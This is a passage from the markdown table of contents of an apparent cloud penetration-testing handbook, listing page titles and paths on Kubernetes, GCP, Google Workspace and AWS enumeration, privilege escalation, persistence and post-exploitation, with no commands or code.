Pentesting](pentesting-cloud/kubernetes-security/README.md) - * [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md) - * [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md) - * [Kubelet Authentication & Authorization](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/kubelet-authentication-and-authorization.md) - * [Exposing Services in Kubernetes](pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md) - * [Attacking Kubernetes from inside a Pod](pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.md) - * [Kubernetes Enumeration](pentesting-cloud/kubernetes-security/kubernetes-enumeration.md) - * [Kubernetes Role-Based Access Control(RBAC)](pentesting-cloud/kubernetes-security/kubernetes-role-based-access-control-rbac.md) - * [Abusing Roles/ClusterRoles in Kubernetes](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/README.md) - * [Pod Escape Privileges](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) - * [Kubernetes Roles Abuse Lab](pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/kubernetes-roles-abuse-lab.md) - * [Kubernetes Namespace Escalation](pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md) - * [Kubernetes External Secret Operator](pentesting-cloud/kubernetes-security/kubernetes-external-secrets-operator.md) - * [Kubernetes Pivoting to Clouds](pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md) - * [Kubernetes Network Attacks](pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md) - * [Kubernetes Hardening](pentesting-cloud/kubernetes-security/kubernetes-hardening/README.md) - * [Kubernetes SecurityContext(s)](pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md) - * [Kubernetes OPA Gatekeeper](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md) - * [Kubernetes OPA Gatekeeper bypass](pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md) - * [Kubernetes Kyverno](pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md) - * [Kubernetes Kyverno bypass](pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md) - * [Kubernetes ValidatingWebhookConfiguration](pentesting-cloud/kubernetes-security/kubernetes-validatingwebhookconfiguration.md) -* [GCP Pentesting](pentesting-cloud/gcp-security/README.md) - * [GCP - Basic Information](pentesting-cloud/gcp-security/gcp-basic-information/README.md) - * [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md) - * [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md) - * [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md) - * [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md) - * [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md) - * [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) - * [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) - * [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) - * [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) - * [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) - * [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md) - * [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md) - * [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md) - * [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md) - * [GCP - Logging Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-logging-post-exploitation.md) - * [GCP - Monitoring Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-monitoring-post-exploitation.md) - * [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - * [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - * [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) - * [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - * [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - * [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) - * [GCP - Apikeys Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-apikeys-privesc.md) - * [GCP - AppEngine Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-appengine-privesc.md) - * [GCP - Artifact Registry Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-artifact-registry-privesc.md) - * [GCP - Batch Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-batch-privesc.md) - * [GCP - BigQuery Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-bigquery-privesc.md) - * [GCP - ClientAuthConfig Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-clientauthconfig-privesc.md) - * [GCP - Cloudbuild Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md) - * [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - * [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - * [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) - * [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - * [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - * [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) - * [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md) - * [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md) - * [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md) - * [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md) - * [GCP - Orgpolicy Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.md) - * [GCP - Pubsub Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.md) - * [GCP - Resourcemanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.md) - * [GCP - Run Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.md) - * [GCP - Secretmanager Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.md) - * [GCP - Serviceusage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.md) - * [GCP - Sourcerepos Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.md) - * [GCP - Storage Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.md) - * [GCP - Workflows Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.md) - * [GCP - Generic Permissions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.md) - * [GCP - Network Docker Escape](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.md) - * [GCP - local privilege escalation ssh pivoting](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) - * [GCP - Persistence](pentesting-cloud/gcp-security/gcp-persistence/README.md) - * [GCP - API Keys Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md) - * [GCP - App Engine Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.md) - * [GCP - Artifact Registry Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.md) - * [GCP - BigQuery Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.md) - * [GCP - Cloud Functions Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.md) - * [GCP - Cloud Run Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.md) - * [GCP - Cloud Shell Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.md) - * [GCP - Cloud SQL Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.md) - * [GCP - Compute Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.md) - * [GCP - Dataflow Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.md) - * [GCP - Filestore Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.md) - * [GCP - Logging Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.md) - * [GCP - Secret Manager Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.md) - * [GCP - Storage Persistence](pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.md) - * [GCP - Token Persistance](pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistance.md) - * [GCP - Services](pentesting-cloud/gcp-security/gcp-services/README.md) - * [GCP - AI Platform Enum](pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.md) - * [GCP - API Keys Enum](pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.md) - * [GCP - App Engine Enum](pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.md) - * [GCP - Artifact Registry Enum](pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.md) - * [GCP - Batch Enum](pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.md) - * [GCP - Bigquery Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.md) - * [GCP - Bigtable Enum](pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.md) - * [GCP - Cloud Build Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md) - * [GCP - Cloud Functions Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md) - * [GCP - Cloud Run Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md) - * [GCP - Cloud Shell Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md) - * [GCP - Cloud SQL Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md) - * [GCP - Cloud Scheduler Enum](pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md) - * [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md) - * [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md) - * [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md) - * [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md) - * [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md) - * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md) - * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md) - * [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md) - * [GCP - Firestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firestore-enum.md) - * [GCP - IAM, Principals & Org Policies Enum](pentesting-cloud/gcp-security/gcp-services/gcp-iam-and-org-policies-enum.md) - * [GCP - KMS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-kms-enum.md) - * [GCP - Logging Enum](pentesting-cloud/gcp-security/gcp-services/gcp-logging-enum.md) - * [GCP - Memorystore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md) - * [GCP - Monitoring Enum](pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md) - * [GCP - Pub/Sub Enum](pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md) - * [GCP - Secrets Manager Enum](pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md) - * [GCP - Security Enum](pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md) - * [GCP - Source Repositories Enum](pentesting-cloud/gcp-security/gcp-services/gcp-source-repositories-enum.md) - * [GCP - Spanner Enum](pentesting-cloud/gcp-security/gcp-services/gcp-spanner-enum.md) - * [GCP - Stackdriver Enum](pentesting-cloud/gcp-security/gcp-services/gcp-stackdriver-enum.md) - * [GCP - Storage Enum](pentesting-cloud/gcp-security/gcp-services/gcp-storage-enum.md) - * [GCP - Workflows Enum](pentesting-cloud/gcp-security/gcp-services/gcp-workflows-enum.md) - * [GCP <--> Workspace Pivoting](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/README.md) - * [GCP - Understanding Domain-Wide Delegation](pentesting-cloud/gcp-security/gcp-to-workspace-pivoting/gcp-understanding-domain-wide-delegation.md) - * [GCP - Unauthenticated Enum & Access](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/README.md) - * [GCP - API Keys Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-api-keys-unauthenticated-enum.md) - * [GCP - App Engine Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-app-engine-unauthenticated-enum.md) - * [GCP - Artifact Registry Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-artifact-registry-unauthenticated-enum.md) - * [GCP - Cloud Build Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) - * [GCP - Cloud Functions Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) - * [GCP - Cloud Run Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) - * [GCP - Cloud SQL Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) - * [GCP - Compute Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) - * [GCP - IAM, Principals & Org Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md) - * [GCP - Source Repositories Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md) - * [GCP - Storage Unauthenticated Enum](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md) - * [GCP - Public Buckets Privilege Escalation](pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md) -* [GWS - Workspace Pentesting](pentesting-cloud/workspace-security/README.md) - * [GWS - Post Exploitation](pentesting-cloud/workspace-security/gws-post-exploitation.md) - * [GWS - Persistence](pentesting-cloud/workspace-security/gws-persistence.md) - * [GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md) - * [GWS - Admin Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md) - * [GCDS - Google Cloud Directory Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md) - * [GCPW - Google Credential Provider for Windows](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcpw-google-credential-provider-for-windows.md) - * [GPS - Google Password Sync](pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md) - * [GWS - Google Platforms Phishing](pentesting-cloud/workspace-security/gws-google-platforms-phishing/README.md) - * [GWS - App Scripts](pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts.md) -* [AWS Pentesting](pentesting-cloud/aws-security/README.md) - * [AWS - Basic Information](pentesting-cloud/aws-security/aws-basic-information/README.md) - * [AWS - Federation Abuse](pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md) - * [AWS - Permissions for a Pentest](pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md) - * [AWS - Persistence](pentesting-cloud/aws-security/aws-persistence/README.md) - * [AWS - API Gateway Persistence](pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md) - * [AWS - Cognito Persistence](pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md) - * [AWS - DynamoDB Persistence](pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md) - * [AWS - EC2 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md) - * [AWS - ECR Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md) - * [AWS - ECS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md) - * [AWS - Elastic Beanstalk Persistence](pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md) - * [AWS - EFS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md) - * [AWS - IAM Persistence](pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md) - * [AWS - KMS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md) - * [AWS - Lambda Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md) - * [AWS - Abusing Lambda Extensions](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md) - * [AWS - Lambda Layers Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md) - * [AWS - Lightsail Persistence](pentesting-cloud/aws-security/aws-persistence/aws-lightsail-persistence.md) - * [AWS - RDS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-rds-persistence.md) - * [AWS - S3 Persistence](pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md) - * [AWS - SNS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md) - * [AWS - Secrets Manager Persistence](pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md) - * [AWS - SQS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md) - * [AWS - SSM Perssitence](pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md) - * [AWS - Step Functions Persistence](pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md) - * [AWS - STS Persistence](pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md) - * [AWS - Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/README.md) - * [AWS - API Gateway Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md) - * [AWS - CloudFront Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md) - * [AWS - CodeBuild Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md) - * [AWS Codebuild - Token Leakage](pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md) - * [AWS - Control Tower Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md) - * [AWS - DLM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md) - * [AWS - DynamoDB Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md) - * [AWS - EC2, EBS, SSM & VPC Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md) - * [AWS - EBS Snapshot Dump](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md) - * [AWS - Malicious VPC Mirror](pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md) - * [AWS - ECR Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md) - * [AWS - ECS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation.md) - * [AWS - EFS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-efs-post-exploitation.md) - * [AWS - EKS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-eks-post-exploitation.md) - * [AWS - Elastic Beanstalk Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) - * [AWS - IAM Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation.md) - * [AWS - KMS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-kms-post-exploitation.md) - * [AWS - Lambda Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/README.md) - * [AWS - Steal Lambda Requests](pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-warm-lambda-persistence.md) - * [AWS - Lightsail Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-lightsail-post-exploitation.md) - * [AWS - Organizations Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.md) - * [AWS - RDS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.md) - * [AWS - S3 Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.md) - * [AWS - Secrets Manager Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.md) - * [AWS - SES Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.md) - * [AWS - SNS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.md) - * [AWS - SQS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md) - * [AWS - SSO & identitystore Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) - * [AWS - Step Functions Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md) - * [AWS - STS Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md) - * [AWS - VPN Post Exploitation](pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md) - * [AWS - Privilege Escalation](pentesting-cloud/aws-security/aws-privilege-escalation/README.md) - * [AWS - Apigateway Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md) - * [AWS - Chime Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md) - * [AWS - Codebuild Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md) - * [AWS - Codepipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md) - * [AWS - Codestar Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md) - * [codestar:CreateProject, codestar:AssociateTeamMember](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md) - * [iam:PassRole, codestar:CreateProject](pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md) - * [AWS - Cloudformation Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/README.md) - * [iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md) - * [AWS - Cognito Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.md) - * [AWS - Datapipeline Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md) - * [AWS - Directory Services Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md) - * [AWS - DynamoDB Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md) - * [AWS - EBS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.md) - * [AWS - EC2 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.md) - * [AWS - ECR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.md) - * [AWS - ECS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.md) - * [AWS - EFS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.md) - * [AWS - Elastic Beanstalk Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) - * [AWS - EMR Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.md) - * [AWS - EventBridge Scheduler Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md) - * [AWS - Gamelift](pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.md) - * [AWS - Glue Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.md) - * [AWS - IAM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md) - * [AWS - KMS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md) - * [AWS - Lambda Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md) - * [AWS - Lightsail Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.md) - * [AWS - Mediapackage Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md) - * [AWS - MQ Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md) - * [AWS - MSK Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md) - * [AWS - RDS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md) - * [AWS - Redshift Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md) - * [AWS - Route53 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md) - * [AWS - SNS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md) - * [AWS - SQS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md) - * [AWS - SSO & identitystore Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) - * [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md) - * [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md) - * [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md) - * [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md) - * [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md) - * [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md) - * [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md) - * [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md) - * [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md) - * [AWS - Security & Detection 